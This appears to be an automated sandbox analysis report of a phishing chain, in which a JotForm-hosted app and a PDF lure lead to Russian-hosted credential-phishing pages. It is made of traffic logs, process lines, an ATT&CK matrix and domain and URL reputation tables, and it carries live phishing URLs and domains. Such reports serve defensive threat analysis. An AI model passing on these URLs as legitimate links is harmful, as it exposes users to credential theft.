Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: classification engineClassification label: mal60.phis.win@36/218@84/23
Source: chromecache_217.1.drInitial sample: https://dm9h.zomivane.ru/oiznew3n/
Source: chromecache_217.1.drInitial sample: https://southcentralusr-notifyp.svc.ms/api/v2/tracking/method/click?mi=qqzi7lakke-xavef-uoyeg&ru=https%3a%2f%2fprivacy.microsoft.com%2fprivacystatement&tc=privacystatement&cs=0e07659b2986c666099c66b21d33f3f7
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1960,i,13832150121213406412,16672036579387046635,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://eu.jotform.com/app/250092704521347"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1960,i,13832150121213406412,16672036579387046635,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 199
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 212Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 217
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 199Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 217Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Spearphishing Link
Windows Management Instrumentation2
Browser Extensions
1
Process Injection
11
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomains1
Drive-by Compromise
Scheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://eu.jotform.com/app/2500927045213470%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://www.xfa.org/schema/xfa-form/0%Avira URL Cloudsafe
https://cdn.jotfor.ms$0%Avira URL Cloudsafe
file:///C:/Users/user/Downloads/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf0%Avira URL Cloudsafe
https://dm9h.zomivane.ru/favicon.ico100%Avira URL Cloudphishing
https://sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru/bXsQrxXYFsYVrgqTWHzsoezSpBZQNYHYTYFXZUAAVELNZAUTFWC0%Avira URL Cloudsafe
http://www.xfa.org/schema/xfa-locale-set/0%Avira URL Cloudsafe
http://www.xfa.org/schema/xdc/0%Avira URL Cloudsafe
http://www.xfa.org/schema/xci/0%Avira URL Cloudsafe
http://www.xfa.org/schema/xfa-connection-set/0%Avira URL Cloudsafe
https://dm9h.zomivane.ru/oIZnEw3n/)100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
cdn01.jotfor.ms
104.22.72.81
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      sni1gl.wpc.alphacdn.net
      152.199.21.175
      truefalse
        high
        sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru
        188.114.96.3
        truefalse
          high
          cdn.jotfor.ms
          172.67.7.107
          truefalse
            high
            s-part-0017.t-0009.t-msedge.net
            13.107.246.45
            truefalse
              high
              s-part-0017.t-0009.fb-t-msedge.net
              13.107.253.45
              truefalse
                high
                eu.jotform.com
                104.19.128.105
                truefalse
                  high
                  dm9h.zomivane.ru
                  104.21.96.1
                  truetrue
                    unknown
                    www.jotform.com
                    104.19.128.105
                    truefalse
                      high
                      js.jotform.com
                      104.19.128.105
                      truefalse
                        high
                        code.jquery.com
                        151.101.130.137
                        truefalse
                          high
                          cdnjs.cloudflare.com
                          104.17.24.14
                          truefalse
                            high
                            challenges.cloudflare.com
                            104.18.94.41
                            truefalse
                              high
                              cdn03.jotfor.ms
                              104.22.72.81
                              truefalse
                                high
                                sni1gl.wpc.omegacdn.net
                                152.199.21.175
                                truefalse
                                  high
                                  www.google.com
                                  142.250.186.68
                                  truefalse
                                    high
                                    cdn02.jotfor.ms
                                    172.67.7.107
                                    truefalse
                                      high
                                      o61806.ingest.sentry.io
                                      34.120.195.249
                                      truefalse
                                        high
                                        eu-files.jotform.com
                                        34.107.251.125
                                        truefalse
                                          high
                                          events.jotform.com
                                          104.19.129.105
                                          truefalse
                                            high
                                            s-part-0032.t-0009.t-msedge.net
                                            13.107.246.60
                                            truefalse
                                              high
                                              www.office.com
                                              unknown
                                              unknownfalse
                                                high
                                                aadcdn.msftauth.net
                                                unknown
                                                unknownfalse
                                                  high
                                                  identity.nel.measure.office.net
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    login.microsoftonline.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      fpt.live.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        NameMaliciousAntivirus DetectionReputation
                                                        https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/DocumentPreview.af8c5c66.jsfalse
                                                          high
                                                          https://dm9h.zomivane.ru/favicon.icofalse
                                                          • Avira URL Cloud: phishing
                                                          unknown
                                                          https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                            high
                                                            https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/5241.1f05701c.jsfalse
                                                              high
                                                              https://events.jotform.com/action?actor=guest_5a3c5173c0bb4f63&action=DocumentPreviewed&target=%7B%22portalID%22:%22250092704521347%22,%22portalType%22:%22APP%22,%22itemID%22:%221%22,%22device%22:%22desktop%22,%22isPWA%22:false%7D&project=portal-app&ref=https:%2F%2Feu.jotform.com%2Fapp%2F250092704521347false
                                                                high
                                                                https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/7988.f937c1ff.jsfalse
                                                                  high
                                                                  https://a.nel.cloudflare.com/report/v4?s=NTy5FmInOhUR88Lwrok3kwnPNKIH1pnWwJpPUp1Hwt3iZqhpMbqVtdAdlgfYyuBVugBTlSiEpQnm8tehb8Y6AgK8NKLJUbNdWCkk0rO%2FaR2A%2B6%2FJ63gdvNQpauEc8Q%3D%3Dfalse
                                                                    high
                                                                    https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/3186.c12c9a19.jsfalse
                                                                      high
                                                                      https://cdn01.jotfor.ms/s/portal/674ac14411e/static/js/8953.7f4b13b0.jsfalse
                                                                        high
                                                                        https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Bold.woff2false
                                                                          high
                                                                          file:///C:/Users/user/Downloads/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdftrue
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.jotform.com/uploads/Gittens_Murray/form_files/Screenshot%202025-01-10%20at%2002.51.26.678100df0e5de0.10817411.pngfalse
                                                                            high
                                                                            https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.jsfalse
                                                                              high
                                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qvn8h/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/false
                                                                                high
                                                                                https://cdn02.jotfor.ms/s/vendor/static/pwacompat/2.0.11/pwacompat.min.jsfalse
                                                                                  high
                                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1345087052:1736511132:9pUcYqZrWbbHpnfn5qQ_UbKx0b4hCOzXHinJW-FbhBw/8ffcb89d1f3defa1/qdboioj1nzs.qKQ2IGA2i7DiVRCgVnxvzNdYE4uMfkM-1736512675-1.1.1.1-w8jZba1V.DYVKzlxhgfgquKi9isi8IRagts8fZYqLVNPs8x4jdIPsX2NIiP90oRofalse
                                                                                    high
                                                                                    https://cdn03.jotfor.ms/s/portal/674ac14411e/static/css/6354.b5c7ba01.chunk.cssfalse
                                                                                      high
                                                                                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                                        high
                                                                                        https://eu.jotform.com/uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?width=32&height=32&time=1736507717false
                                                                                          high
                                                                                          https://events.jotform.com/action?actor=guest_5a3c5173c0bb4f63&action=appViewed&target=%7B%22portalID%22:%22250092704521347%22,%22portalType%22:%22APP%22,%22utmSource%22:null,%22device%22:%22desktop%22,%22isPWA%22:false%7D&project=portal-app&ref=https:%2F%2Feu.jotform.com%2Fapp%2F250092704521347false
                                                                                            high
                                                                                            https://sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru/bXsQrxXYFsYVrgqTWHzsoezSpBZQNYHYTYFXZUAAVELNZAUTFWCfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8ffcb89d1f3defa1/1736512677070/VO297syEMFordm7false
                                                                                              high
                                                                                              https://cdn.jotfor.ms/stylebuilder/static/donationBox.css?v=3ff9d3efalse
                                                                                                high
                                                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8ffcb6abdab37d06/1736512597511/3H40ckXZIbhbHk8false
                                                                                                  high
                                                                                                  https://eu.jotform.com/server/check-olark-chat-support?from=app-builderfalse
                                                                                                    high
                                                                                                    https://cdn02.jotfor.ms/s/portal/674ac14411e/static/css/index.5048e680.cssfalse
                                                                                                      high
                                                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8ffcb89d1f3defa1/1736512677071/7977c391453e8cc5dc41842a441afeb8af031a56098e1995b3d4de3c39a237ab/Yl3kcMMdozhDgWJfalse
                                                                                                        high
                                                                                                        https://eu.jotform.com/uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?width=144&height=144&time=1736507717false
                                                                                                          high
                                                                                                          https://eu.jotform.com/app/250092704521347false
                                                                                                            high
                                                                                                            https://cdn02.jotfor.ms/s/portal/674ac14411e/static/js/index.f047cc75.jsfalse
                                                                                                              high
                                                                                                              https://cdn.jotfor.ms/assets/img/favicons/favicon-2021-light.pngfalse
                                                                                                                high
                                                                                                                https://cdn.jotfor.ms/fonts/?family=Circular:400:500:700false
                                                                                                                  high
                                                                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ffcb89d1f3defa1&lang=autofalse
                                                                                                                    high
                                                                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/688879100:1736511142:tGsU17yq18PkVnI4wKa3Ww51WTbxFUU1SF8xW7QVDR4/8ffcb6abdab37d06/ZizkGAal8K5b0bq9fQsWLsrFRcrAiFKh.Y5WJ48rebc-1736512595-1.1.1.1-7REzBxzifHwqMMjHAfCLgybYIs4UYWCpBrJIy.X6bN2QQ58Y4moZJeHrjd0eNxGufalse
                                                                                                                      high
                                                                                                                      https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/5083.cbf741f8.jsfalse
                                                                                                                        high
                                                                                                                        https://www.jotform.com/uploads/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdffalse
                                                                                                                          high
                                                                                                                          https://dm9h.zomivane.ru/oIZnEw3n/true
                                                                                                                            unknown
                                                                                                                            https://cdn03.jotfor.ms/s/portal/674ac14411e/static/css/DocumentPreview.6d5451e5.chunk.cssfalse
                                                                                                                              high
                                                                                                                              https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Book.woff2false
                                                                                                                                high
                                                                                                                                https://o61806.ingest.sentry.io/api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0false
                                                                                                                                  high
                                                                                                                                  https://js.jotform.com/actions.jsfalse
                                                                                                                                    high
                                                                                                                                    https://cdn01.jotfor.ms/s/vendor/static/pdfjs-dist/2.14.305/pdf.worker.jsfalse
                                                                                                                                      high
                                                                                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                                                                                                        high
                                                                                                                                        https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/6158.c797260a.jsfalse
                                                                                                                                          high
                                                                                                                                          https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/jotform.css.a4a80bcb.jsfalse
                                                                                                                                            high
                                                                                                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ffcb6abdab37d06&lang=autofalse
                                                                                                                                              high
                                                                                                                                              https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/8508.337c9fc2.jsfalse
                                                                                                                                                high
                                                                                                                                                https://cdn03.jotfor.ms/s/portal/674ac14411e/static/css/jotform.css.e448a675.cssfalse
                                                                                                                                                  high
                                                                                                                                                  https://eu.jotform.com/uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.pngfalse
                                                                                                                                                    high
                                                                                                                                                    https://cdn02.jotfor.ms/s/vendor/static/moment-timezone/0.5.43/moment-timezone-with-data.min.jsfalse
                                                                                                                                                      high
                                                                                                                                                      https://cdn01.jotfor.ms/s/vendor/static/moment/2.29.4/moment-with-locales.min.jsfalse
                                                                                                                                                        high
                                                                                                                                                        https://cdn01.jotfor.ms/s/umd/674ac14411e/for-push-notification.jsfalse
                                                                                                                                                          high
                                                                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                          https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BoldItalic.woff2)chromecache_275.1.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://github.com/zloirock/core-jschromecache_200.1.dr, chromecache_251.1.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Italic.woff2)chromecache_239.1.dr, chromecache_275.1.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://cdn03.jotfor.ms/s/portal/674ac14411echromecache_188.1.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Thin.woff2)chromecache_275.1.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.xfa.org/schema/xfa-form/chromecache_200.1.dr, chromecache_251.1.drfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Book.woff2)chromecache_239.1.dr, chromecache_275.1.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BookItalic.woff)chromecache_275.1.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Bold.woff)chromecache_239.1.dr, chromecache_275.1.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Light.woff)chromecache_275.1.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Black.woff)chromecache_275.1.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://www.xfa.org/schema/xfa-locale-set/chromecache_200.1.dr, chromecache_251.1.drfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://cdn.jotfor.ms/assets/img/favicons/chromecache_188.1.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://cdn.jotfor.ms$chromecache_213.1.drfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
